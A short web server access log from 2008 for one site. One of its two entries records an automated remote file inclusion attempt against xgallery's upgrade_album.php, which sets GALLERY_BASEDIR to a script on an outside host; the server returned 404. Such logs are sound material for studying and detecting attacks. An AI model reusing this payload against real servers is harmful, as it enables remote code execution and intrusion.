74.6.28.156 - - [26/Jan/2008:18:48:23 -0800] "GET /minamijewelry/bird.psd HTTP/1.0" 200 109644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.244.196.210 - - [26/Jan/2008:18:49:00 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
